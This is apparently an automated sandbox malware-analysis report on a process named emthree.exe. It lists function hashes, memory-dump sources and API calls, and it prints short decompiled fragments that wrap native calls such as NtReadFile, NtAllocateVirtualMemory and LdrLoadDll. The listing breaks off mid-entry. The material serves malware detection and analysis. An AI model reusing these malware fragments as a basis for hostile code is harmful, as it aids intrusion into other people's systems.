Function 032A9B30, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,032A9991,00000800,00000000,00000000), ref: 032A9BA2

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 47092ecd9c06349676c41e93dfffc47745d7c2ec9652edeb00b51d5e617a7875
Instruction ID: cb43b74c53bf8853eb53c103b9ac0d98d0457b695bf138db809d532cfd3c2b33
Opcode Fuzzy Hash: 47092ecd9c06349676c41e93dfffc47745d7c2ec9652edeb00b51d5e617a7875
Instruction Fuzzy Hash: B51114B2C002498FDB10CFAAD844BDEFBF5EF98354F14841AD515A7600C375A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032A98A8, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 032A9916

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a777675f24439e29a7aa35adcb7d1df1bbd5cffcb94b5cfc869140fa603b9790
Instruction ID: d0b9e9d378a262511ef06d207d48df3f6db43685687c9b657ae5a883e2efec4d
Opcode Fuzzy Hash: a777675f24439e29a7aa35adcb7d1df1bbd5cffcb94b5cfc869140fa603b9790
Instruction Fuzzy Hash: 891112B1C006499FCB20CF9AD484BDEFBF0EF88314F14845AD459A7600D374A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032A98B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 032A9916

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 20497999e9efd437f783f3610e16f0645640106aafe79549f4c4e526eff4a89b
Instruction ID: 218575119765983cbfc68489288d89074a43cd8cf1918eb3711ae682b803bc69
Opcode Fuzzy Hash: 20497999e9efd437f783f3610e16f0645640106aafe79549f4c4e526eff4a89b
Instruction Fuzzy Hash: 2E110FB1C006498FDB10CF9AD444BDEFBF4EB89324F14841AD829B7600C374A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0156D650, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d4bef09721ba7ab9190b53bad84ec134b34e1c1fd803c0462aac0b3dd1dc41
Instruction ID: ce0ea8838a71586beacbb70ed63baa1e43e8f57ac057f279f5de48000714e672
Opcode Fuzzy Hash: e9d4bef09721ba7ab9190b53bad84ec134b34e1c1fd803c0462aac0b3dd1dc41
Instruction Fuzzy Hash: 84212DB1604280DFCF05DF94D9C0F1ABBB9FB88314F248969D9894F206C33AD851CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0156D1FC, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c16dec5d5285ff5fb4cd3fbfc814dcbfaa83d52fba5e6d378e7f1bbecdbe47
Instruction ID: 66ed6120071dbbfa1e0be5321fce122bff9fe845332a3b6534772dbef667f5ea
Opcode Fuzzy Hash: 57c16dec5d5285ff5fb4cd3fbfc814dcbfaa83d52fba5e6d378e7f1bbecdbe47
Instruction Fuzzy Hash: 8C21D8B2604240DFDF05CF94D9C4B2ABBB9FB88324F148969E9454F246C336D456CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0156D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89611391a7cff210bc9b65649f08df54581b57311e5237ee1923f76d1645444
Instruction ID: 0cf8c28d78a10fe5a3a8d594bac3f42b46b66693768efd8dcda5976c33377bd7
Opcode Fuzzy Hash: f89611391a7cff210bc9b65649f08df54581b57311e5237ee1923f76d1645444
Instruction Fuzzy Hash: C22106B1604240DFDB01DF54D9C0B2ABFB9FB98318F248969D9454F606C336D856CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0157D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238569911.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f677f9126fa525fbf138ef07f1a710a5ee15713b6ed72e238cb2e8a98a27de6
Instruction ID: 0c6c389c6f1567ad8014d834b745d8de536b528ac100851119476c4c4a04bafe
Opcode Fuzzy Hash: 8f677f9126fa525fbf138ef07f1a710a5ee15713b6ed72e238cb2e8a98a27de6
Instruction Fuzzy Hash: 3021D3B1608240EFDB01DF94E9C1B2ABBB5FF84224F24C969D9494F246C336D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0157D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238569911.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b0c2c8c03f7e403e098a6b7c19dfe31743d274f6b2e9b7119000aa11be3d91
Instruction ID: ee7df4dc1f88361a7bd00512ad7adf813d9f80ff821c5bd58a33ea762eef2728
Opcode Fuzzy Hash: b4b0c2c8c03f7e403e098a6b7c19dfe31743d274f6b2e9b7119000aa11be3d91
Instruction Fuzzy Hash: 752103B5508240DFCB12CF54E9C4B2ABBB1FF84354F24C969D9094F246D336D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0157D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238569911.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bc6eecbc10784c072df5180b5661f319852067b0729002a714a6070ed115ab
Instruction ID: 54fb07cef24b9eaaf1521ce62b6948c780983f13a2550c171085c0c8617f4fb1
Opcode Fuzzy Hash: 12bc6eecbc10784c072df5180b5661f319852067b0729002a714a6070ed115ab
Instruction Fuzzy Hash: E6216A755093808FCB03CF24D990B15BF71BF46214F28C5EAD8498F667C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0156D64B, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b1a81a284b081c6d85cfe3f1f04165711b0f2c7ca9a1a0c8809a762f1ef132
Instruction ID: f65535a2bdd4555570cd260780e3abe6d929af40cf51390ba917971cbd24f721
Opcode Fuzzy Hash: a9b1a81a284b081c6d85cfe3f1f04165711b0f2c7ca9a1a0c8809a762f1ef132
Instruction Fuzzy Hash: 9021D276504280DFCF16CF44D9C0B1ABF72FB88314F2886A9D9490F616C33AD466CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0156D1F7, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6cad6174da13177be94e40a6d8780e75a6999654640b6988d3e742a438cb2b
Instruction ID: 13c9865fbc7b4aaf8247fcb7b9d8f2cbe15636a678073f700362f1e9f5a198be
Opcode Fuzzy Hash: 5a6cad6174da13177be94e40a6d8780e75a6999654640b6988d3e742a438cb2b
Instruction Fuzzy Hash: 8021CD76504280DFCB02CF44D9C4B5ABF71FB84324F2886A9DC440F616C33AD466CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0156D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8c83324249e34049ce2a7b68b1a5f4821c87249376ca5df26932b8facb5e37
Instruction ID: 5768ed5891eead171e87e6fc6a5c368295a78d52f99ce16b2560eadce85b76cc
Opcode Fuzzy Hash: fb8c83324249e34049ce2a7b68b1a5f4821c87249376ca5df26932b8facb5e37
Instruction Fuzzy Hash: B811B176904280DFCB12CF54D5C4B1ABF71FB94324F28C6A9D8454FA16C33AD456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0157D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238569911.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c81d551c641d2338193f382ecd99b30a24c6d0950aa7bdb31ce62e8d1b034df
Instruction ID: 1bf5ef398931a22fa53b264866a399b8e1935e9e513d459ee96812a9fff64c64
Opcode Fuzzy Hash: 7c81d551c641d2338193f382ecd99b30a24c6d0950aa7bdb31ce62e8d1b034df
Instruction Fuzzy Hash: E3118875904280DFDB12CF54E5C4B19BFB1FF84224F28C6AAD8494F656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0156D7C1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832c9ba629d084431f3eb3c2f8845dd7bce8eb9f9942d38a14c5e934022ce6bd
Instruction ID: 66f758a61de8737820e9b77ad740a1574053aabe95fe292397ea94c6309fe2b3
Opcode Fuzzy Hash: 832c9ba629d084431f3eb3c2f8845dd7bce8eb9f9942d38a14c5e934022ce6bd
Instruction Fuzzy Hash: AE01F7715083849AE7114A5ACC8876AFBECFF51264F098C19EE484F242C3789444CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 0156D7C0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238524240.000000000156D000.00000040.00000001.sdmp, Offset: 0156D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f450e79d28d1f809bd1e16b201a61269fc4e642a0f89910444fae45b38f408f
Instruction ID: 216bef475a963893a417d47437ee2d2807efcb755e5c0d87cb4c0fe651e8e7f5
Opcode Fuzzy Hash: 2f450e79d28d1f809bd1e16b201a61269fc4e642a0f89910444fae45b38f408f
Instruction Fuzzy Hash: CAF0C8714043849FE7108A05CCC8766FFECEB51674F18C45AED484F282C3745844CAF0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 032AE5B0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee0a55af7d9136567f3d7cd3a630925a0a3155f9673b1858be922b1b0b23b957
Instruction ID: d71e40a41c025bb48d0401441b596ffb2b2432dfc8d5d2c8e047be3c6e49e1ab
Opcode Fuzzy Hash: ee0a55af7d9136567f3d7cd3a630925a0a3155f9673b1858be922b1b0b23b957
Instruction Fuzzy Hash: E312C8F14217468AD310EF67F99C1897BA1F756328BB0C308D2652BAD9D7B4B14ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 032AC164, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae08da9c7c33488ee37f30199ef762b6de03e38d2a2f37b459b0fa313b9a6b66
Instruction ID: d12b83f5aff270f048dbf3e3c102f05a1f4a9e14939918e76e2a7ed27428ac71
Opcode Fuzzy Hash: ae08da9c7c33488ee37f30199ef762b6de03e38d2a2f37b459b0fa313b9a6b66
Instruction Fuzzy Hash: 85A18136E2061A8FCF05DFB9D8445DEB7F2FF88300B15856AE905BB261DB71A985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 032AE5A2, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c54015f8fa252af55c102813802eb7fefca413d99f6d7b491d6b8fc435b4ad
Instruction ID: d261d7bc3caab12887cdd9bb08038d25acf0085e155e5bf775d66c6ece811a61
Opcode Fuzzy Hash: 29c54015f8fa252af55c102813802eb7fefca413d99f6d7b491d6b8fc435b4ad
Instruction Fuzzy Hash: 35C118B18217468AD310EF67F88C1897BB1BB96328F71C318D1616B6D8D7B4B04ACF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: emthree.exe PID: 5772 Parent PID: 4600 emthree.exeCOMMON

Executed Functions

Function 00419FF0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00419FF0(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a40) {
				void* _v3;
				intOrPtr _t13;
				void* _t14;
				void* _t18;
				intOrPtr _t20;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_t13 = _a4;
				_t20 =  *((intOrPtr*)(_t13 + 0x10));
				_t28 = _t13 + 0xc48;
				_t14 = E0041AB40(_t27, _t13, _t28, _t20, 0, 0x2a);
				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t20;
				asm("adc al, 0x52");
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28, _t20, _t14 - 0x8b, _t29); // executed
				return _t18;
			}

0x00419ff3
0x00419ff6
0x00419fff
0x0041a007
0x0041a011
0x0041a017
0x0041a02d
0x0041a035
0x0041a039

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A035

Strings

BMA, xrefs: 0041A012, 0041A020
BMA, xrefs: 0041A02D, 0041A034

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 47391d639efac316311ffb50b35ad37227ecba0ab777e9e89f8ea37865c82293
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 86F0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D634E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A03A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A035

Strings

BMA, xrefs: 0041A020
BMA, xrefs: 0041A02D, 0041A034

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 7667df86b4670ab182bf084ea5d8498124de479297fffc57d989d6cc8a3e52e7
Instruction ID: 9ef04c3773a5a465b2b93160ca6defe714005acf1527c0270aaaa9989c754bf5
Opcode Fuzzy Hash: 7667df86b4670ab182bf084ea5d8498124de479297fffc57d989d6cc8a3e52e7
Instruction Fuzzy Hash: 56E01AB62040486BCB04CFA8ED94CEB77ADEF8C350B108609FA9CC3200C534E8128BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C830( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC50(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CED0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B080(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction ID: b4f7a1af0e17271dbab1f8f9811de8a59031fb4189e0604a5181f46414007b8b
Opcode Fuzzy Hash: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction Fuzzy Hash: 440112B5D4020DA7DB10DAA5DC82FDEB7799B54308F0041A9E908A7281F635EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB40(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f4f
0x00419f57
0x00419f8d
0x00419f91

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F8D

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 8ea736774ba8911b8279b9cfd49072e0c789f2d5db859ac2b7c7e6ef757ed24e
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: E6F0BDB2205208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A120, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A120(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB40(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a12f
0x0041a137
0x0041a159
0x0041a15d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 41af93f0003505e3ba0015a63dd184b135cd46b9981c195137c9cf1cde5447cb
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 66F015B2200208ABCB14DF89CC81EEB77ADAF88754F118149BE0997241C634F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A06B, Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A06B(void* __eax, void* __ebx, void* __edx, void* _a4) {
				intOrPtr _v0;
				long _t11;
				void* _t17;

				_push(ds);
				asm("enter 0x8b55, 0xec");
				_t8 = _v0;
				_t3 = _t8 + 0x10; // 0x300
				_t4 = _t8 + 0xc50; // 0x40a923
				E0041AB40(_t17, _v0, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a4); // executed
				return _t11;
			}

0x0041a06e
0x0041a06f
0x0041a073
0x0041a076
0x0041a07f
0x0041a087
0x0041a095
0x0041a099

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A095

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a1b6a4109e032b30f65154c7ce9721893eacd6e26c7e73bb0254ce96a56b094d
Instruction ID: 727383570be3b99997b818c97bb6eda718c06e663dffee66966a2f67e663d266
Opcode Fuzzy Hash: a1b6a4109e032b30f65154c7ce9721893eacd6e26c7e73bb0254ce96a56b094d
Instruction Fuzzy Hash: 6FE0C271240210BFE712EF99CC44FDBBB58EF84360F0544AAFA089F282C231E60087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB40(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a073
0x0041a076
0x0041a07f
0x0041a087
0x0041a095
0x0041a099

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A095

Memory Dump Source

Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: f089eca4a97aa68d4ce2a285eb3c247b66ebf33d40eb504c7b8fdb92d1b2e104
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 53D01776200214ABD710EB99CC85FE7BBADEF48760F154499BA199B242C534FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01029910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102991A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
Instruction ID: 878fbbdb5b448471a8d4aa652203e5919befb66cfd9d585cb76835cf29415190
Opcode Fuzzy Hash: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
Instruction Fuzzy Hash: 149002B122100902D140719984047460109A7D0342F91C011A5454554EC6998DE577A5

Uniqueness

Uniqueness Score: -1.00%

Function 010299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010299AA

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
Instruction ID: aa4a37bed587550ef9467aec38bc1f07e25c5d06725e9b8f31570c41a0df4203
Opcode Fuzzy Hash: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
Instruction Fuzzy Hash: 589002A136100942D10061998414B060109E7E1342F91C015E1454554DC659CC627266

Uniqueness

Uniqueness Score: -1.00%

Function 01029840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102984A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
Instruction ID: 27e7f997586d380aa8351c15ef4d1ddb306e1541e4ff8f0d5d20cbba9319dea0
Opcode Fuzzy Hash: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
Instruction Fuzzy Hash: 31900261262046525545B1998404507410AB7E02827D1C012A1804950CC5669866E761

Uniqueness

Uniqueness Score: -1.00%

Function 01029860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102986A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
Instruction ID: 0269b32bcb8943da6e62541dce365fa93da17aec66b3f0b31f23f751275f1b2d
Opcode Fuzzy Hash: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
Instruction Fuzzy Hash: B790027122100913D11161998504707010DA7D0282FD1C412A0814558DD6968962B261

Uniqueness

Uniqueness Score: -1.00%

Function 010298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010298FA

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
Instruction ID: bfa8fdb8e4f1e9375ae6f7c4cbd55992d2bbeb87acf3a0cd7365e287bc2878b8
Opcode Fuzzy Hash: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
Instruction Fuzzy Hash: 9990026162100A02D10171998404616010EA7D0282FD1C022A1414555ECA6589A2B271

Uniqueness

Uniqueness Score: -1.00%

Function 01029A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029A0A

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
Instruction ID: e9332fc8bb0adc80e2e26c0e1dbefcd5aeae9eec41da453da6b6b496f8d7e4b1
Opcode Fuzzy Hash: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
Instruction Fuzzy Hash: CD90027122140902D1006199881470B0109A7D0343F91C011A1554555DC665886176B1

Uniqueness

Uniqueness Score: -1.00%

Function 01029A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
